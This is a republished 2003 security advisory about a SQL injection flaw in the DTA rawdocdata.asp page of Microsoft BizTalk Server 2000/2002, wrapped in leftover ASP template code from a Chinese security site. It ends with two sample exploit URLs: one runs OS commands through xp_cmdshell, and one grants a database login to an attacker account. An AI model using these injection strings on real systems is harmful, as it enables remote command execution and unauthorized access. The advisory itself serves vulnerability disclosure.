<% dim ModuleName,InfoID,ChannelShortName,CorrelativeArticle,InstallDir,ChannelDir,Keyword,PageTitle,ArticleIntro,Articlecontent Keyword=stripHTML("exists,logic") PageTitle=stripHTML("Microsoft BizTalk Server 2000/2002 DTA rawdocdata.asp SQL Injection Vulnerability") ArticleIntro=stripHTML("77169.com小编引言:Microsoft BizTalk Server 2000/2002 DTA rawdocdata.asp SQL Injection Vulnerability,漏洞的主") Articlecontent=stripHTML("source: http://www.securityfocus.com/bid/7470/info

A vulnerability has been rep…") ModuleName = stripHTML("exploits") InfoID = stripHTML("170867") ChannelShortName=stripHTML("漏洞") InstallDir=stripHTML("http://www.77169.com/") ChannelDir=stripHTML("exploits") %> Microsoft BizTalk Server 2000/2002 DTA rawdocdata.asp SQL Injection Vulnerability - 华盟网 - http://www.77169.com
您现在的位置: 华盟网 >> 漏洞 >> 最新漏洞 >> 其它漏洞 >> 正文

Microsoft BizTalk Server 2000/2002 DTA rawdocdata.asp SQL Injection Vulnerability

2003/4/28 作者:不祥 来源: 互联网
导读 <% if len(ArticleIntro)<3 then Response.Write Articlecontent 'Response.Write "Articlecontent" else Response.Write ArticleIntro 'Response.Write "ArticleIntro" end if %>
source: http://www.securityfocus.com/bid/7470/info

A vulnerability has been reported for BizTalk Server which may make it possible for remote users to modify database query logic. The vulnerability exists in some of the pages used by the DTA interface.

This vulnerability may be the result of inadequate sanitization of user-supplied values for some parameters. A remote attacker may exploit this vulnerability by creating a malicious URL that includes specially crafted SQL queries to execute commands or compromise the database. 

http://server/biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnDirection=1;execmaster.dbo.xp_cmdshell 'any OS command'--

http://server/biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnDirection=1;execmaster.dbo.sp_grantlogin 'domain\attacker'--